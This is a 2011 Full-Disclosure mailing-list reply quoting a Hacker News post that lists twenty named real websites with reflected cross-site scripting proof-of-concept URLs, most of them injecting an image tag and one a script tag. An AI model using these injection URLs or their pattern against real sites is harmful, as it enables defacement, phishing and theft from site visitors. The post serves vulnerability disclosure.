Very nice :) Impressive for XSS (for once). xd
On 7 September 2011 09:28, Mohit Kumar <[email protected]> wrote: > Most of the biggest and Famous sites are found to be Vulnerable to XSS > attack . Cross-site scripting (XSS) is a type of computer security > vulnerability typically found in web applications which allow code injection > by malicious web users into the web pages viewed by other users. Examples of > such code include HTML code and client-side scripts. An exploited cross-site > scripting vulnerability can be used by attackers to bypass access controls > such as the same origin policy. Recently, vulnerabilities of this kind have > been exploited to craft powerful phishing attacks and browser exploits. > Cross-site scripting was originally referred to as CSS, although this usage > has been largely discontinued. > > Hacker with code name "*Invectus*" list some such famous sites with > XSS vulnerability as listed below : > *1.)* > http://video.state.gov/en/search/img-srchttp-i55tinypiccom-witu7dpng-height650-width1000/Ij48aW1nIHNyYz0iaHR0cDovL2k1NS50aW55cGljLmNvbS93aXR1N2QucG5nIiBoZWlnaHQ9IjY1MCIgd2lkdGg9IjEwMDAiPg%3D%3D > > *2.)* > http://www.telegraph.co.uk/search/?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E > > *3.)* > http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&noMimimumKeywords=false > > *4.) * > http://www.schools.nsw.edu.au/psearch/ext/?refine=new&QueryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&Go.x=29&Go.y=25&Go=submit > > *5.) * > http://thetablet.co.uk/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E > > *6.)* > http://www.scstatehouse.gov/cgi-bin/query.exe?first=FIRST&querytext=&category=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E > > *7.)* > http://www.highered.tafensw.edu.au/vsearch/tafehigheredu/?QueryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E > > *8.)* > http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E > > *9.)* > http://www.watersportholland.nl/cgi-bin/watersportholland/zoeken.cgi?search=Vera&query=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E > > *10.)* > http://www.gpo.gov/fdsys/search/searchresults.action?st=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E > > *11.)* > http://www.networkcomputing.com/sitesearch?sort=publishDate+desc&queryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E > > *12.)* > http://www.unc.edu/search/index.htm?q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&cx=014532668884084418890%3Ajyc_iub1byy&cof=FORID%3A10&ie=UTF-8&hq=inurl%3Adevnet.unc.edu > > *13.) * > http://cugir.mannlib.cornell.edu/search?querytext=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E > > *14.)* > http://ieeexplore.ieee.org./search/freesearchresult.jsp?newsearch=true&queryText=.QT.%3E%3Cimg+src.EQ..QT.http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png.QT.+height.EQ..QT.650.QT.+width.EQ..QT.1000.QT.%3E&x=58&y=13 > > *15.)* > http://vivo-vis.cns.iu.edu/vivo1/search?querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E > > *16.)* > http://google.nyu.edu/search?site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&x=8&y=6 > > *17.)* > http://ofa.fas.harvard.edu/cal/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E > > *18.)* > http://www.uidaho.edu/search?q=%22%3E%3Cscript%3EInvectus%3C/script%3E&cof=FORID:9&cref=http://www.uidaho.edu/search?xml=1&ticks=634508915004972966 > > *19.)* > https://vivo.ufl.edu/search?flag1=1&querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E > > *20.)* > http://energy.gov/search/site/%22%3E%3Cimg%20src%3D%22http%3A//i55.tinypic.com/witu7d.png%22%20height%3D%22650%22%20width%3D%221000%22%3E > > Original Post ; : The Hacker News ~ > http://thehackernews.com/2011/09/20-famous-websites-vulnerable-to-cross.html > -- > *Regards,* > *Owner,* > *The Hacker News <http://www.thehackernews.com/>* > *Truth is the most Powerful weapon against Injustice.* > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
